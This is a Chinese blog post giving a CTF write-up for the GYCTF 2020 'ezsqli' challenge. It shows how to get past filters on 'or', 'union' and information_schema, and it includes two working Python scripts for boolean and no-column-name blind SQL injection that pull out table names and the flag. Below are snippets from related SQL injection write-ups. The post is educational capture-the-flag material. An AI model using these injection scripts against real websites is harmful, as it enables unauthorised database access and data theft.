ezsqli(GYCTF-WEB)

最新推荐文章于 2024-08-26 08:33:41 发布
最新推荐文章于 2024-08-26 08:33:41 发布
阅读量976 收藏
点赞数
分类专栏: WRITEUP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43536759/article/details/104837307
版权

1.知识点

SQL盲注:

  • 布尔盲注
  • 无列名盲注

2.分析

题目过滤了or和union,无法使用Information_Schema.Tables。
之前常用的 innodb_table_stats 和 innodb_index_stats 也无法使用。
但是我们首先需要查找flag所在的表名,这里我们参考
Alternatives to Extract Tables and Columns from MySQL and MariaDB
文章是用sys 来查找表名的。
本题脚本我参考了颖奇L’Amore师傅Smi1e师傅的脚本。
下面是我自己觉得可以用的脚本。
列名查找:

import requests
import string
url = "题目url"

def exp1():
    str1 = ('0123456789'+string.ascii_letters+string.punctuation).replace("'","").replace('"','').replace('\\','')
    flag = ''
    select = 'select group_concat(table_name) from sys.x$schema_flattened_keys'
    for j in range(1,40):
        for i in str1:
            paylaod = "1/**/&&/**/(select substr(({}),{},1))='{}'".format(select, j, i)
            #print(paylaod)
            data = {
                'id': paylaod,
            }
            r = requests.post(url,data=data)
            if 'Nu1L' in r.text:
                flag += i
                print(flag)
                break
if __name__ == '__main__':
    exp1()

flag获取:

import requests
url = '题目url'

def trans(flag):
    res = ''
    for i in flag:
        res += hex(ord(i))
    res = '0x' + res.replace('0x','')
    return res

flag = ''
for i in range(1,50):
    hexchar = ''
    for char in range(32, 126):
        hexchar = trans(flag+ chr(char))
        payload = '2||((select 1,{})<(select * from f1ag_1s_h3r3_hhhhh))'.format(hexchar)
        data = {
                'id':payload
                }
        r = requests.post(url=url, data=data)
        if 'V&N' in r.text:
            flag += chr(char-1)
            print(flag)
            break
print((flag[:-1] + chr(ord(flag[-1]) + 1)).lower())

3.原理

1.关于‘sys.x$schema_flattened_keys’可以直接参考MySQL和MariaDB提取表和列的方法

2.脚本进行了hex()操作,这是因为MySQL遇到hex会自动转成字符串。

参考:
i春秋2020新春战“疫”网络安全公益赛GYCTF Writeup 第二天
新春战疫公益赛-ezsqli-出题小记

火 柴 人
关注
专栏目录
ezsqli
qq_40710190的博客
09-28 474
ezsqli 根据题目的提示这是一道关于SQL注入的题,这几天恶补了一波SQL注入,记录一下解题过程 1.前景知识 MySQL数据库注入基础 报错基于GET的注入GET-Error based PHP绕过and和or过滤 先看下来吧,如果有不会的在回头来前景知识这里找好了 2.正题进入 二话不说,F12查看源码 <script type="text/javascript"> name = $_POST['name']; $password = $_POST['pw'];
BUUCTF:[GYCTF2020]Ezsqli --过滤了information_schem ------ 无列明注入之过滤了union 使用ascii偏移来做
Zero_Adam的博客
03-15 1512
一、自己做: 直截了当的sql注入,先用fuzz字典跑一下: information_schema.table等被过滤了, 而且union 也被过了, 尝试了 || 和&& 等没有过滤,并且strsub,limit等都没有过滤,初步判断盲注应该时可以的。 但是 information_chema等被过滤了,表和 列都查不出来, 二、学到的&&不足: 当information_schema等被过滤的时候,能够查出数据库的名字,但是表明不知道,这时可以用这个来sys.schem
[GYCTF2020]Ezsqli
yym68686
09-03 1168
[GYCTF2020]Ezsqli 打开网页发现有个输入框,随便输入1 or 2,发现or被过滤了,因此尝试fuzz看看,还过滤了哪些sql关键词,我使用的fuzz字典: WEB SQL Fuzz Dict 发现if,or,union,information_schema.tables均被过滤,因为输入2||True和2||False的返回结果不一致所以要用盲注来判断每个字符是什么。对于过滤掉information_schema的题目,注意到MySQL5.7的新特性: 由于performance_sche
攻防世界-Web高手进阶区-supersqli(强网杯的随便注)
feng的博客
09-14 1830
前言 此题可谓是奇技淫巧甚多,之前做过一次,不过当时没有写WP。今天偶然又看到了这个题目,打开环境发现又有些不会,因此又把这题相关的知识点和各种技巧看了一遍,写下这篇WP。 WP 首先进入环境,发现是SQL注入。我们先简单的进行一些测试,发现是字符型注入,因此加一个单引号然后后面加#来闭合,然后测试1=1,1=2,发现都可以,然后进行order by测试,发现是2。但是在进行union注入的时候出现: return preg_match("/select|update|delete|drop|insert|
攻防世界-web题型-10星难度-个人wp
最新发布
DamnVanish的博客
08-26 893
到此攻防世界web题型所有都做了一遍,有一些题目因为环境的原因没有完成还有一些是打着web考的是其他方向的知识点,确实还是很有难度的,不过经过这段时间的靶场沉淀我能明显的感受到在真实环境下也有很多渗透的思路和一个大致的流程和打靶场是一样的。
[GYCTF2020] web题-Ezsqli
BROTHERYY的博客
12-30 449
这题一直出问题,用脚本跑到一半都会崩。 后面换了一个,能够跑出来。 详细情况可以看看Ying师傅的blog https://www.gem-love.com/ctf/1782.html 我把跑出来的代码贴出来可以参考下 # coding:utf-8 import requests import time url = 'http://2aa83373-6644-4c2f-904a-9f15560d4f1c.node3.buuoj.cn/' def str_hex(s): #十六进制转换 fl ==>
buuctf-[GYCTF2020]Ezsqli(异或注入无列名)
m0_62094846的博客
05-18 666
尝试过后发现只有1,2可以,3以上会显示错误 尝试一下slq注入,但是输入不是1,2的就会显示错误 尝试异或注入 被过滤了 过滤了for,in在information里也被过滤了 可以用这种方式获得当前数据库,但是information不能用了,也没什么绕过的方式,就不能查表之类的了 id=1^(ascii(substr(database(),1,1))=103)^1 换成 innodb_table_stats 也没用 聊一聊bypass in...
buu-[GYCTF2020]Ezsqli
qaq517384的博客
10-10 404
朴实无华一张图片,一个输入框,图片太大就不放了 1是Nu1L,2是V&N,剩下都是“Error Occured When Fetch Result.” fuzz一下,507的都是被过滤了的 过滤了关键的information, 要用到无列名注入,找库名时需要用到用到5.7版本新增的sys库 利用sys库里的三个表都行 schema_table_statistics/schema_table_statistics_with_buffer /x$schema_flattened_keys 表可以找到
CTF---Web---SQL注入---07---注入点+level
qq_22160557的博客
07-31 516
文章目录前言一、题目描述二、解题步骤1、寻找注入点2、请求包保存3、sqlmap爆破三、总结 前言 题目分类: CTF—WebSQL注入—07—注入点+level 一、题目描述 题目:添加备注 二、解题步骤 1、寻找注入点 Step1:本题在常规注入的地方,是无法注入的:但是这是下面有个添加备注的地方 2、请求包保存 Step2:添加备注后,抓包后,保存为txt文件 3、sqlmap爆破 Step3:丢到sqlmap中跑就行了。 注入点为id,注入类型为以时间为基础的时间盲注。 Step4:爆
攻防世界 misc 4-1
09-13
攻防世界的misc 4-1题目需要进行一些步骤和操作来解决。首先,我们需要前往题目链接。在这个链接中,我们可以找到题目的详细描述和要求。根据题目要求,我们需要使用binwalk工具进行分析。binwalk是一个用于分析二进制文件的工具,可以用于提取其中的隐藏信息。接下来,我们可以根据保存的requirements.txt文件来安装所需的依赖库,例如opencv-python和matplotlib。这些库将在我们后续的操作中用到。完成这些准备工作后,我们可以根据题目的要求和提示来进一步解题。具体的解题步骤和方法,可以参考攻防世界misc2-1杂项的详细解题博客。这篇博客中提供了对misc2-1题目的详细解析和操作步骤,对于解答misc 4-1题目也是有帮助的。希望以上信息对您有所帮助。如果还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值